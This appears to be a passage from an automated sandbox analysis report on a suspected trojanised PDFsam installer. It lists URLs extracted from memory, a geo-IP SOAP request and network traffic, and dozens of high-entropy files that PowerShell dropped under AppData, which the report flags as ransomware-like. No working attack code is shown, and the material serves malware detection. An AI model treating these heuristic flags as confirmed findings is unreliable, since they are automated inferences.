                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpString found in binary or memory: http://web.ncdc.gov.sa/crl/nrcaparta1.crl
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmp, PDFsamEnhanced7Installer.exe, 00000006.00000003.694628217.0000000004A28000.00000004.00000001.sdmpString found in binary or memory: http://www.acabogacia.org/doc0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpString found in binary or memory: http://www.acabogacia.org0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.689712753.0000000004A11000.00000004.00000001.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm0U
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.689712753.0000000004A11000.00000004.00000001.sdmpString found in binary or memory: http://www.accv.es00
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpString found in binary or memory: http://www.agesic.gub.uy/acrn/acrn.crl0)
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpString found in binary or memory: http://www.agesic.gub.uy/acrn/cps_acrn.pdf0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmp, PDFsamEnhanced7Installer.exe, 00000006.00000003.694606857.0000000004AB1000.00000004.00000001.sdmpString found in binary or memory: http://www.ancert.com/cps0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694491904.0000000004AEA000.00000004.00000001.sdmpString found in binary or memory: http://www.anf.es
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694628217.0000000004A28000.00000004.00000001.sdmpString found in binary or memory: http://www.anf.es/AC/RC/ocsp0c
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694491904.0000000004AEA000.00000004.00000001.sdmpString found in binary or memory: http://www.anf.es/es/address-direccion.html
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.1011349925.00000000086FF000.00000004.00000001.sdmp, PDFsamEnhanced7Installer.exe, 00000006.00000003.727619780.000000000406F000.00000004.00000010.sdmp, PDFsamEnhanced7Installer.exe, 00000006.00000002.1020087072.0000000008CE0000.00000004.00000001.sdmp, PDFsamEnhanced7Installer.exe, 00000006.00000002.1019536395.0000000008902000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.727308898.000000000403C000.00000004.00000010.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0B1si
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.1011349925.00000000086FF000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0RobotoLight
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694790490.0000000004A21000.00000004.00000001.sdmpString found in binary or memory: http://www.ca.posta.rs/dokumentacija0h
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.689677218.0000000004A2F000.00000004.00000001.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.690083725.0000000004A2F000.00000004.00000001.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/%
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694606857.0000000004AB1000.00000004.00000001.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694628217.0000000004A28000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com/dpc/0Z
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class1.crl0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class2.crl0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694628217.0000000004A28000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3.crl0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694464278.0000000004B02000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmp, PDFsamEnhanced7Installer.exe, 00000006.00000003.694464278.0000000004B02000.00000004.00000001.sdmpString found in binary or memory: http://www.chambersign.org1
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpString found in binary or memory: http://www.comsign.co.il/cps0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694475221.0000000004AFC000.00000004.00000001.sdmpString found in binary or memory: http://www.datev.de/zertifikat-policy-bt0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpString found in binary or memory: http://www.datev.de/zertifikat-policy-int0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694540995.0000000004ABA000.00000004.00000001.sdmpString found in binary or memory: http://www.datev.de/zertifikat-policy-std0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpString found in binary or memory: http://www.defence.gov.au/pki0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000000.712904817.0000000000F9D000.00000002.00020000.sdmp, Nyship-Empire-Plan-Gym-Membership.msiString found in binary or memory: http://www.digicert.com/CPS0
                        Source: Nyship-Empire-Plan-Gym-Membership.msiString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694540995.0000000004ABA000.00000004.00000001.sdmpString found in binary or memory: http://www.disig.sk/ca/crl/ca_disig.crl0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694540995.0000000004ABA000.00000004.00000001.sdmpString found in binary or memory: http://www.disig.sk/ca0f
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694540995.0000000004ABA000.00000004.00000001.sdmpString found in binary or memory: http://www.dnie.es/dpc0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694453223.0000000004FE4000.00000004.00000001.sdmpString found in binary or memory: http://www.e-me.lv/repository0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694464278.0000000004B02000.00000004.00000001.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crl
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694464278.0000000004B02000.00000004.00000001.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crt0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694464278.0000000004B02000.00000004.00000001.sdmpString found in binary or memory: http://www.e-szigno.hu/SZSZ/0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpString found in binary or memory: http://www.e-trust.be/CPS/QNcerts
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694475221.0000000004AFC000.00000004.00000001.sdmpString found in binary or memory: http://www.ecee.gov.pt/dpc0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694628217.0000000004A28000.00000004.00000001.sdmpString found in binary or memory: http://www.echoworx.com/ca/root2/cps.pdf0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694628217.0000000004A28000.00000004.00000001.sdmpString found in binary or memory: http://www.eme.lv/repository0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694540995.0000000004ABA000.00000004.00000001.sdmpString found in binary or memory: http://www.firmaprofesional.com/cps0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694464278.0000000004B02000.00000004.00000001.sdmpString found in binary or memory: http://www.globaltrust.info0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694464278.0000000004B02000.00000004.00000001.sdmpString found in binary or memory: http://www.globaltrust.info0=
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694491904.0000000004AEA000.00000004.00000001.sdmpString found in binary or memory: http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694464278.0000000004B02000.00000004.00000001.sdmpString found in binary or memory: http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694491904.0000000004AEA000.00000004.00000001.sdmpString found in binary or memory: http://www.oaticerts.com/repository.
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpString found in binary or memory: http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_1_0.pdf09
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694628217.0000000004A28000.00000004.00000001.sdmpString found in binary or memory: http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_21_1.pdf0:
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpString found in binary or memory: http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpString found in binary or memory: http://www.pki.gva.es/cps0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpString found in binary or memory: http://www.pki.gva.es/cps0%
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694491904.0000000004AEA000.00000004.00000001.sdmpString found in binary or memory: http://www.pkioverheid.nl/policies/root-policy-G20
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694453223.0000000004FE4000.00000004.00000001.sdmpString found in binary or memory: http://www.pkioverheid.nl/policies/root-policy0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpString found in binary or memory: http://www.postsignum.cz/crl/psrootqca2.crl02
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.696206732.0000000004A20000.00000004.00000001.sdmpString found in binary or memory: http://www.quovadis.bm0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694464278.0000000004B02000.00000004.00000001.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpString found in binary or memory: http://www.rcsc.lt/repository0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694491904.0000000004AEA000.00000004.00000001.sdmpString found in binary or memory: http://www.sk.ee/cps/0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694491904.0000000004AEA000.00000004.00000001.sdmpString found in binary or memory: http://www.sk.ee/juur/crl/0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694464278.0000000004B02000.00000004.00000001.sdmpString found in binary or memory: http://www.ssc.lt/cps03
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694475221.0000000004AFC000.00000004.00000001.sdmpString found in binary or memory: http://www.suscerte.gob.ve/dpc0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694475221.0000000004AFC000.00000004.00000001.sdmpString found in binary or memory: http://www.suscerte.gob.ve/lcr0#
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpString found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694491904.0000000004AEA000.00000004.00000001.sdmpString found in binary or memory: http://www.trustdst.com/certificates/policy/ACES-index.html0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpString found in binary or memory: http://www.uce.gub.uy/acrn/acrn.crl0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpString found in binary or memory: http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmpString found in binary or memory: http://www.winimage.com/zLibDllNUL
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpString found in binary or memory: http://www2.postsignum.cz/crl/psrootqca2.crl01
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmpString found in binary or memory: https://api-updateservice.pdfsam.org
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmpString found in binary or memory: https://api-updateservice.pdfsam.orghttps://stage-api-updateservice.pdfsam.orgInstaller
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmpString found in binary or memory: https://bugreport.pdfsam.org/Service.asmxSOAPAction:
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694628217.0000000004A28000.00000004.00000001.sdmpString found in binary or memory: https://crl.anf.es/AC/ANFServerCA.crl0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmpString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpString found in binary or memory: https://eca.hinet.net/repository0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000000.712904817.0000000000F9D000.00000002.00020000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/raw-file/default/security/nss/lib/ckfw/builtins/cert
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.696206732.0000000004A20000.00000004.00000001.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000000.712904817.0000000000F9D000.00000002.00020000.sdmpString found in binary or memory: https://paygw.pdfsam.org/redirect/
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmpString found in binary or memory: https://paygw.pdfsam.org/redirect/https://downloadenhanced7.pdfsam.org/&configId=common-data.datD:
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.979217766.0000000004A34000.00000004.00000001.sdmpString found in binary or memory: https://pdfsam.org/privacy-policy/
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694464278.0000000004B02000.00000004.00000001.sdmpString found in binary or memory: https://rca.e-szigno.hu/ocsp0-
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmpString found in binary or memory: https://removing-start.htm
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.689560405.0000000004A3F000.00000004.00000001.sdmpString found in binary or memory: https://repository.luxtrust.lu0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000000.712904817.0000000000F9D000.00000002.00020000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmpString found in binary or memory: https://stage-api-updateservice.pdfsam.org
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000000.712904817.0000000000F9D000.00000002.00020000.sdmpString found in binary or memory: https://stats.pdfsam.org/Tracking.asmxLdLuldlucannot
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694491904.0000000004AEA000.00000004.00000001.sdmpString found in binary or memory: https://web.certicamara.com/marco-legal0Z
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.980712276.0000000004AAD000.00000004.00000001.sdmpString found in binary or memory: https://wsgeoip.pdfsam.org/
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmpString found in binary or memory: https://wsgeoip.pdfsam.org/ipservice.asmx
                        Source: unknown. HTTP traffic detected:
                            POST /ipservice.asmx HTTP/1.1
                            Accept: text/*
                            SOAPAction: "http://upclick.com/GetLocationInfo"
                            Content-Type: text/xml; charset=utf-8
                            User-Agent: VCSoapClient
                            Host: wsgeoip.pdfsam.org
                            Content-Length: 346
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                        Source: unknown. DNS traffic detected: queries for: api-updateservice.pdfsam.org
                        Source: unknown. HTTPS traffic detected: 64.15.159.234:443 -> 192.168.2.4:49785 version: TLS 1.2

                        Spam, unwanted Advertisements and Ransom Demands:

                        Writes many files with high entropy
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\yicVjkbxqXsEHlhOp.FHXvtRKNqugc entropy: 7.99836639126Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\RIDwqQlOShWbB.DbIqQNkpiX entropy: 7.99860466208Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\SZEwUsrtgzTLq.IKJoYcWZNqjmy entropy: 7.998522771Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\DcJKGzsLoUHwdX.RENXkbpjPcdVDF entropy: 7.99822704815Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\dyLVtBHlIAYSxpEgz.MHPzriKYueyCQ entropy: 7.99776993949Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\LJznrKxpyev.SVONxUmwgskphGZndz entropy: 7.99903385566Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\WNpCtncjMmgZzh.NpdiSJRDag entropy: 7.99763526637Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\pHrCdQLUzWDGOEcNsh.AiCapRLtkEcjQPrFHw entropy: 7.99711810914Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\baYIzxdoZBShnFusUW.SxgkZUwfLIGEiFq entropy: 7.99882584449Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\DUziVQlMtBASd.PcgpHaRTfDKrVzU entropy: 7.99899142285Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\FiqrYmjEVZDB.XrINmGLDsli entropy: 7.99599708355Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\MzQXnKpVhcwFJ.MjcskRTKCtFdzU entropy: 7.99733399566Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\BSjgNxXywaEUizpAM.TdmaLypxJivWSOF entropy: 7.99894621691Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\LaiGpcVSKO.fQkenRdrZDxuIm entropy: 7.99903751415Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\PhBMnijfgvzeWFCyu.LXQnKvNVIeqRft entropy: 7.99903839306Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\rtMpcCmVYPUATdu.xCWtzoNIml entropy: 7.99823329987Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\pUOKADnHErWscxtiIF.xgGiJHEyhOkR entropy: 7.99907372235Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\EUotKfksDBGZyH.nbeMulNAgGh entropy: 7.99878346073Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\eFAuURICmGWxTJhZ.rANdkeWhLaMIPsz entropy: 7.99830783081Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\CSlvxtifgyNDuO.JZixNhldfnGusteFKL entropy: 7.99714123126Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\jRTFwtHxZzfQk.JIZsoypMCETBGXlh entropy: 7.99888433791Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\ZruqUQNTAMoJiEPvgbj.TQjvYIWgdJHxl entropy: 7.99877371959Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\LyNkQoObcYpGBvaK.CIRkbJFwWdEaj entropy: 7.99852675162Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\ZSQcNEOCztejdm.quGefcAYyXgDSot entropy: 7.99763458544Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\jfdFmxnYhrLDZtHXb.gPIvndFeMAjyOsxLNz entropy: 7.9989281105Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\PbIDenfGQKx.zElKnPYTdymqjU entropy: 7.99841444447Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\GdEokeVIwBjhLc.nMRKpxCQFBdZcfXirWN entropy: 7.99891312914Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\yApgcBWNRek.hNoCKMdHIFbWsV entropy: 7.99775434701Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\VHuBdTtSOiYELFrwZDv.jhfZQXHGognVTq entropy: 7.99888203305Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\qUbmiKZveG.gjMlKXVyDWGFETUJ entropy: 7.9990548714Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\HguaokTAjUxvfBhViR.LoIMASDzvOQmCVFjgxt entropy: 7.99911144811Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\abKgFMrHtlPdVuRfCD.rKbtqsNWCpDvMlnmgAR entropy: 7.99881358251Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\hNzakweXpOnRr.ZUVyXawsiqSo entropy: 7.99852405792Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\AEUqJVPnvMdHG.jhaPgeFzLwZTGcsA entropy: 7.99808947647Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\DkxNFlieKuHW.CqBZlQiGyMYmR entropy: 7.99887809143Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\XdMowcJHIlpDuhL.gVBaQuUhMYIqnFTzxWm entropy: 7.998994609Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\jayVmLblhkc.VAhdWSvapN entropy: 7.99877636395Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\xqZFGPobdYlzRJrhm.TaMrvmsbdLucUY entropy: 7.99817739929Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\oqPfYvAlZLiCatc.UlXcqgCxzwSZjNJ entropy: 7.99884404291Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\mOypzjQubiL.DwTnpEFAXkBIs entropy: 7.99817341804Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\RAswJiTFDGOWcQ.UQAOiPrXmWVhMIs entropy: 7.99795377091Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\fJNzeMPqlHuCXwU.uHgyXIeMqWjpVmLx entropy: 7.99823720582Jump to dropped file
